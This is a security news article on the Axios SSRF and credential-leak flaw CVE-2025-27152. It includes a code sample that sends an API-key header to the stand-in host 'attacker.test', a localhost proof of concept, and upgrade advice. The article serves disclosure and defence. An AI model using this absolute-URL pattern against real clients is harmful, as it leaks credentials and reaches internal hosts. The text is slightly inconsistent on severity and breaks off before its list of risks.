A critical security issue has been identified in the Axios package for JavaScript, which poses significant risks to millions of servers due to server-side request forgery (SSRF) and credential leakage.
This vulnerability occurs when absolute URLs are used in Axios requests, even when a base URL is specified.
The vulnerability associated with Axios is identified by the CVE ID CVE-2025-27152. It affects versions of Axios less than or equal to 1.7.9 and has been rated with a moderate severity level.
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// Example of an absolute URL being passed
const userId = "http://attacker.test/";
// SSRF Vulnerability Example
await internalAPIClient.get(userId); // Sends request to http://attacker.test/ instead of the baseURL
In the code snippet above, even though a base URL is set for the Axios client, passing an absolute URL to the get() method leads to requests being sent directly to the specified absolute URL.
This bypasses the intended security mechanisms, as sensitive credentials such as the X-API-KEY are included in the request headers and can be leaked to unintended hosts.
To demonstrate this vulnerability, a simple proof of concept (PoC) can be set up using two local HTTP servers.
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
node main.js
The output will be “this is server2,” indicating that the request was successfully redirected to the unintended server.
The vulnerability poses two main risks:
To mitigate this risk, users should update to Axios version 1.8.2 or later, where the issue has been fixed. Additionally, implementing strict validation for any user-provided URLs is crucial to prevent SSRF attacks.
The vulnerability was reported by @lambdasawa shared in Github, adding emphasis on the importance of community involvement in software security.
This recent security issue highlights the need for diligence in managing dependencies and validating inputs, especially with widely used libraries like Axios.
By updating to patched versions and enforcing robust security practices, developers can protect their applications and internal networks from SSRF and credential leakage threats.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations, particularly…
As artificial intelligence continues to reshape the technological landscape, tools like Snowflake’s CORTEX Search Service…
UNC3944, a financially-motivated threat actor also linked to the group known as Scattered Spider, has…
Cybersecurity researcher has uncovered a massive malware campaign targeting MacOS users through approximately 2,800 compromised…
Cybersecurity researchers have uncovered a critical flaw in the content moderation systems of AI models…
Microsoft’s cybersecurity research team has issued a stark warning about the risks of using default…